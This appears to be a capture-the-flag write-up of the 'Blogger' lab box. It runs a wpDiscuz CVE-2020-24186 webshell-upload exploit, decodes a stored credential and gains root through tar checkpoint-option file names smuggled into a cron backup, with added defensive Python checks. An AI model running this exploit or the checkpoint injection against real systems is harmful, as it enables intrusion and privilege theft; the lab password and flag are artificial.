
OSCP - Other Machines - Blogger

Key points
  • Directory brute-forcing to find useful leads
  • A PHP reverse shell disguised as an image to obtain a reverse connection
  • Nested base64 decoding to recover a password
  • Privilege escalation through a tar backup job
Detailed steps

Start with nmap as usual. Although the SSH version is fairly old, it doesn't give any more useful leads, so attention goes to port 80.

Nmap scan report for 192.168.177.217
Host is up (0.42s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)

Port 80 doesn't look like much either, but directory brute-forcing turned up a few paths that need to be checked one by one.

# Dirsearch started Wed Feb  5 08:26:27 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.132.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

301   319B   http://192.168.132.217/images    -> REDIRECTS TO: http://192.168.132.217/images/
301   319B   http://192.168.132.217/assets    -> REDIRECTS TO: http://192.168.132.217/assets/
301   316B   http://192.168.132.217/css    -> REDIRECTS TO: http://192.168.132.217/css/
301   315B   http://192.168.132.217/js    -> REDIRECTS TO: http://192.168.132.217/js/
403   280B   http://192.168.132.217/server-status

Surprisingly, a blog directory turned up under assets/fonts. Accessing it properly requires adding blogger.pg to /etc/hosts first, but it is clearly a WordPress instance.

A wpscan run shows that the wpDiscuz plugin has a file upload vulnerability.

Searching for an exploit turned up https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE, which can provide a reverse shell.

C:\home\kali\Documents\OFFSEC\play\Blogger\CVE-2020-24186-wpDiscuz-7.0.4-RCE-main> sudo python wpDiscuz_RemoteCodeExec.py -u http://blogger.pg/assets/fonts/blog -p ?p=29    
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 

[+] Response length:[59354] | code:[200]
[!] Got wmuSecurity value: e8f3a1bf79
[!] Got wmuSecurity value: 29 

[+] Generating random name for Webshell...
[!] Generated webshell name: wlitvttntqthjma

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/02/wlitvttntqthjma-1738722269.2139.php 

> id


uid=33(www-data) gid=33(www-data) groups=33(www-data)

Alternatively, php-reverse-shell.php can be modified by hand and uploaded as an image under a post to get a reverse shell; note that the GIF89a marker must be added at the start of the file.
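
A server-side check that defeats that disguise, as an added Python example (not from the post and not wpDiscuz's own code): it refuses non-image extensions outright, requires the magic bytes to match the claimed type, and rejects any body carrying a PHP opener, so a .php upload prefixed with GIF89a fails twice. The file names and sample bodies are constructed.

```python
import os
import re

# Magic bytes for the image types the comment form is meant to accept.
IMAGE_MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Server-side script openers; an "image" containing these is not an image,
# whatever its first six bytes say.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script", re.IGNORECASE)


def validate_image_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons to reject an upload; an empty list means accept.

    Three independent checks: the extension must be on the allow-list (a
    .php name fails here no matter what the body looks like), the magic
    bytes must match that extension, and the body must carry no script
    opener (catches GIF89a followed by PHP saved under a .gif name)."""
    problems = []
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in IMAGE_MAGIC:
        problems.append(f"extension '.{ext}' is not an allowed image type")
    elif not data.startswith(IMAGE_MAGIC[ext]):
        problems.append(f"magic bytes do not match a .{ext} image")
    if SCRIPT_MARKERS.search(data):
        problems.append("body contains server-side script markers")
    return problems


# Constructed samples: a plain GIF header, the same header with PHP behind
# it under both a .php and a .gif name, and a GIF header under a .png name.
SAMPLES = {
    "avatar.gif": b"GIF89a" + b"\x00" * 16,
    "avatar.php": b"GIF89a<?php echo 1; ?>",
    "avatar2.gif": b"GIF89a<?php echo 1; ?>",
    "photo.png": b"GIF89a" + b"\x00" * 16,
}


def check_samples() -> dict[str, list[str]]:
    """Run the validator over every constructed sample."""
    return {name: validate_image_upload(name, body) for name, body in SAMPLES.items()}
```

Even with this check in place, the uploads directory should be served with script execution disabled, so that a miss cannot turn into code execution.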

Once the reverse shell is established, upload linpeas.sh and pspy64 and run them.

In the pspy64 output, /usr/local/bin/backup.sh is run as root from a cron job, and it uses tar to back up local.txt under /home/james/. We don't have james's password yet, though.

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
......
......
2025/02/05 01:10:01 CMD: UID=0    PID=20223  | /bin/sh /usr/local/bin/backup.sh 
2025/02/05 01:10:01 CMD: UID=0    PID=20222  | /bin/sh -c /usr/local/bin/backup.sh 
2025/02/05 01:10:01 CMD: UID=0    PID=20224  | tar czf /tmp/backup.tar.gz local.txt 

The linpeas.sh output, however, turned up a .creds file with the following content: ';u22>'v$)='2a#B&>`c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+(|`yx')Av#>'v%?}:#=+)';y@%'5(2vA!'<y$&u"H!"ll

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 104 Jan 17  2021 /opt/.creds

It looks encrypted or encoded. In CyberChef it can be decoded with ROT47 followed by base64, which yields the password for the james user.
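
The same decoding chain as an added Python example (not part of the original post): ROT47 first, then base64 layers peeled off one by one until the result stops looking like base64. The input is the /opt/.creds content quoted above, and the final layer is the james credentials in user:password form.

```python
import base64
import binascii
import re

# Constructed copy of the 104-byte /opt/.creds content quoted above.
CREDS_BLOB = (
    r"""';u22>'v$)='2a#B&>`c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+(|`yx')Av#>'v%?}:#=+)';y@%'5(2vA!'<y$&u"H!"ll"""
)

# Standard base64 alphabet with optional padding: the test for whether a
# layer is worth handing to the decoder at all.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def rot47(text: str) -> str:
    """Rotate every printable ASCII character (33..126) by 47 places.
    ROT47 is its own inverse, so this both encodes and decodes."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)
    return "".join(out)


def peel_base64(text: str, max_layers: int = 16) -> list[str]:
    """base64-decode repeatedly while the output is still ASCII base64.
    Returns every layer, starting with the input; the last entry is the
    first result that no longer decodes (the plaintext)."""
    layers = [text]
    current = text
    for _ in range(max_layers):
        if len(current) % 4 != 0 or not B64_RE.match(current):
            break
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        layers.append(decoded)
        current = decoded
    return layers


def decode_creds(blob: str) -> str:
    """ROT47 first (CyberChef's first step), then strip the nested base64."""
    return peel_base64(rot47(blob))[-1]
```

Five base64 layers sit under the ROT47, which is why a single base64 step in CyberChef still returns base64-looking text.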

Use the recovered password to switch to james and create files under /home/james to escalate privileges. The idea is to create checkpoint files so that tar, when it runs, executes the accompanying script.

www-data@ubuntu-xenial:/opt$ su james
su james
Password: S3cr37_P@$$W0rd

james@ubuntu-xenial:/opt$ cd /home/james
james@ubuntu-xenial:~$ id
id
uid=1002(james) gid=1002(james) groups=1002(james)

james@ubuntu-xenial:~$ echo "chmod +s /bin/bash" > shell.sh
echo "chmod +s /bin/bash" > shell.sh

james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..
-rw-r--r-- 1 james james  655 Jan 17  2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc
-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout
-rw-r--r-- 1 root  root    33 Feb  5 00:08 local.txt
-rw-rw-r-- 1 james james   19 Feb  5 02:02 shell.sh
drwxr-xr-x 2 james james 4096 Feb  5 02:02 .
james@ubuntu-xenial:~$ cat shell.sh
cat shell.sh
chmod +s /bin/bash
james@ubuntu-xenial:~$  chmod +x shell.sh
 chmod +x shell.sh
james@ubuntu-xenial:~$  touch -- "--checkpoint-action=exec=sh shell.sh"
 touch -- "--checkpoint-action=exec=sh shell.sh"
james@ubuntu-xenial:~$ touch -- "--checkpoint=1"
touch -- "--checkpoint=1"
james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..
-rw-r--r-- 1 james james  655 Jan 17  2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc
-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout
-rw-r--r-- 1 root  root    33 Feb  5 00:08 local.txt
-rwxrwxr-x 1 james james   19 Feb  5 02:02 shell.sh
-rw-rw-r-- 1 james james    0 Feb  5 02:03 --checkpoint-action=exec=sh shell.sh
-rw-rw-r-- 1 james james    0 Feb  5 02:03 --checkpoint=1
drwxr-xr-x 2 james james 4096 Feb  5 02:03 .

After a short wait, the privilege escalation has succeeded.

james@ubuntu-xenial:~$ ls -l /bin/bash
ls -l /bin/bash
-rwxr-xr-x 1 root root 1037528 Jul 12  2019 /bin/bash
james@ubuntu-xenial:~$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash
james@ubuntu-xenial:~$ /bin/bash -p
/bin/bash -p
bash-4.3# cat /root/proof.txt
cat /root/proof.txt
13618d6242920b9f53a9623217760e49
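
On the defender's side the root cause is a root cron job that lets file names from a user-writable directory reach tar's option parser. As an added Python example (not the box's backup.sh, whose contents the post does not show), this is a backup routine that passes paths as data rather than through a shell glob, plus a preflight that flags option-like names; the directory contents are constructed to mirror the listing above.

```python
import os
import tarfile
import tempfile


def option_like_names(src_dir: str) -> list[str]:
    """File names that a shell glob would hand to tar as options.
    Running this over cron-backed home directories is a cheap check."""
    return sorted(n for n in os.listdir(src_dir) if n.startswith("-"))


def safe_backup(src_dir: str, archive_path: str) -> list[str]:
    """Archive the regular files in src_dir without a shell in between.
    tarfile receives each path as data, so a name like '--checkpoint=1'
    is only ever a member name and cannot become a tar option.
    Returns the member names written."""
    names = sorted(
        n for n in os.listdir(src_dir)
        if os.path.isfile(os.path.join(src_dir, n))
        and not os.path.islink(os.path.join(src_dir, n))
    )
    with tarfile.open(archive_path, "w:gz") as tar:
        for name in names:
            tar.add(os.path.join(src_dir, name), arcname=name, recursive=False)
    return names


def demo() -> tuple[list[str], list[str]]:
    """Constructed home directory seeded with the names from the listing
    above. Returns (flagged names, archived member names)."""
    home = tempfile.mkdtemp(prefix="james-")
    for name in ("local.txt", "--checkpoint=1",
                 "--checkpoint-action=exec=sh shell.sh"):
        with open(os.path.join(home, name), "w") as fh:
            fh.write("sample\n")
    flagged = option_like_names(home)
    # The archive goes outside the source directory so it never adds itself.
    archive = os.path.join(tempfile.mkdtemp(prefix="backup-"), "backup.tar.gz")
    archived = safe_backup(home, archive)
    with tarfile.open(archive) as tar:
        stored = sorted(tar.getnames())
    if stored != archived:
        raise RuntimeError("archive members differ from the files added")
    return flagged, archived
```

If the job must stay a shell script, GNU tar stops option parsing at `--`, so placing the file operands after it makes the same names plain files rather than checkpoint options.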


http://www.kler.cn/a/533295.html
